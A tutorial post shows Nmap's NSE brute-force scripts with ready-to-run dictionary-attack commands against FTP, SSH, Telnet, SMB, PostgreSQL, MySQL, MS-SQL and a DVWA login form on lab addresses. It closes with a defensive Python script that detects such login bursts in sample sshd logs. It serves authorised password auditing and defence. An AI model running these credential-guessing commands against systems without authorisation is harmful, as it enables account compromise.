Since Nmap is too large a tool to cover in one post, this article walks through Nmap's brute-force NSE scripts for dictionary attacks. If you are wondering whether a brute-force attack using Nmap is feasible: yes, Nmap ships NSE scripts that perform dictionary attacks against services that require authentication.
Table of Contents
· FTP Brute Force
· SSH Brute Force
· Telnet Brute Force
· SMB Brute Force
· Postgres Brute Force
· HTTP Form Brute Force
The Nmap Scripting Engine (NSE) is one of Nmap's most
powerful and flexible features. It allows users to write (and share) simple
scripts to automate a wide variety of networking tasks. Those scripts are then
executed in parallel with the speed and efficiency you expect from Nmap. The core of the Nmap Scripting Engine is an
embeddable Lua interpreter. The second part of the Nmap Scripting Engine is the
NSE Library, which connects Lua and Nmap.
NSE scripts define a list of categories they belong to. Currently defined categories are auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln.
As mentioned above, this article demonstrates the scripts in the brute category. These scripts use dictionary attacks to guess the authentication credentials of a remote server. Nmap contains scripts for brute-forcing dozens of protocols, including http-brute, oracle-brute, snmp-brute, and many more.
To list all NSE brute-force scripts (script names are lowercase, so the match has to be case-insensitive and the glob has to be quoted so the shell does not expand it):
locate '*.nse' | grep -i brute
Simply specify -sC to enable the most common
scripts. Or specify the --script option to choose your scripts to
execute by providing categories, script file names, or the name of directories
full of scripts you wish to execute. You can customize some scripts by
providing arguments to them via --script-args and --script-args-file
options.
FTP Brute Force
Performs brute-force password auditing against FTP servers. All we need are dictionaries for usernames and passwords, which are passed as script arguments.
nmap -p21 --script ftp-brute.nse --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150
SSH Brute Force
Performs brute-force password guessing against SSH servers; the connection timeout is configurable through the ssh-brute.timeout script argument (default: "5s"). All we need are dictionaries for usernames and passwords, which are passed as script arguments.
nmap -p22 --script ssh-brute.nse --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150
For each valid username/password combination it finds, the script prints the credential.
Telnet Brute Force
Performs brute-force password auditing against Telnet servers; the connection timeout is configurable through the telnet-brute.timeout script argument (default: "5s"). All we need are dictionaries for usernames and passwords, which are passed as script arguments.
nmap -p23 --script telnet-brute.nse --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150
SMB Brute Force
Attempts to guess SMB username/password combinations, saving identified combinations for use in other scripts. Every effort is made to obtain a genuine list of users and to validate each username before using it. When a username is identified, it is not only displayed but also kept in the Nmap registry for later use by other Nmap scripts.
All we need are dictionaries for usernames and passwords, which are passed as script arguments.
nmap -p445 --script smb-brute.nse --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150
Postgres Brute Force
Performs brute-force password auditing against PostgreSQL servers, with a connection timeout that defaults to "5s". All we need are dictionaries for usernames and passwords, which are passed as script arguments.
nmap -p5432 --script pgsql-brute --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150
MySQL Brute Force
Performs brute-force password auditing against MySQL servers, with a connection timeout that defaults to "5s". All we need are dictionaries for usernames and passwords, which are passed as script arguments.
nmap -p3306 --script mysql-brute --script-args userdb=users.txt,passdb=pass.txt 192.168.1.150
HTTP Form Brute Force
Performs brute-force password auditing against HTTP form-based authentication. This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored in the Nmap registry, using the creds library, for other scripts to use. The http-form-brute.path argument points the script at the login form (here the DVWA login page).
nmap -p 80 --script=http-form-brute --script-args "userdb=users.txt,passdb=pass.txt,http-form-brute.path=/dvwa/login.php" 192.168.1.150
MS-SQL Brute Force
Performs brute-force password auditing against MS-SQL servers, with a connection timeout that defaults to "5s". All we need are dictionaries for usernames and passwords, which are passed as script arguments.
nmap -p1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=pass.txt 192.168.1.146
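Every dictionary run above leaves the same footprint on the target: a burst of failed logins from one source address, cycling through usernames, sometimes followed by one success. As an added defender-side example (not part of the original post, and not Nmap code), the Python script below flags that pattern in constructed sshd-style log lines; the threshold of five failures per 60 seconds is an assumed tuning value.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style lines resembling the footprint of a dictionary run:
# many failures from one source within seconds, cycling through usernames.
SAMPLE_LOG = """\
Mar  3 10:15:01 host sshd[2201]: Failed password for invalid user admin from 192.168.1.77 port 50122 ssh2
Mar  3 10:15:01 host sshd[2202]: Failed password for invalid user test from 192.168.1.77 port 50124 ssh2
Mar  3 10:15:02 host sshd[2203]: Failed password for root from 192.168.1.77 port 50126 ssh2
Mar  3 10:15:02 host sshd[2204]: Failed password for invalid user guest from 192.168.1.77 port 50128 ssh2
Mar  3 10:15:03 host sshd[2205]: Failed password for backup from 192.168.1.77 port 50130 ssh2
Mar  3 10:15:04 host sshd[2206]: Accepted password for backup from 192.168.1.77 port 50132 ssh2
Mar  3 10:20:30 host sshd[2310]: Failed password for alice from 10.0.0.5 port 41000 ssh2
Mar  3 10:21:10 host sshd[2311]: Accepted password for alice from 10.0.0.5 port 41002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def parse(lines, year=2024):
    """Yield (timestamp, result, user, ip); syslog has no year, so one is assumed."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]

def detect_dictionary_attacks(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failures inside a sliding window and note
    whether a success followed (threshold and window are assumed tuning values)."""
    failures = defaultdict(list)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)       # ip -> distinct usernames tried
    alerts = {}
    for ts, result, user, ip in parse(lines):
        if result == "Failed":
            failures[ip].append(ts)
            users[ip].add(user)
            while ts - failures[ip][0] > window:   # slide the window forward
                failures[ip].pop(0)
            if len(failures[ip]) >= threshold and ip not in alerts:
                alerts[ip] = {"usernames": users[ip], "success_after": False}
        elif ip in alerts:
            alerts[ip]["success_after"] = True   # burst then success: a credential was found
    return alerts
```

Calling detect_dictionary_attacks(SAMPLE_LOG.splitlines()) flags only 192.168.1.77, with five usernames tried and success_after set, while the single failure from 10.0.0.5 stays below the threshold.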
References:
https://nmap.org/book/nse-usage.html#nse-categories
https://nmap.org/nsedoc/scripts/http-form-brute.html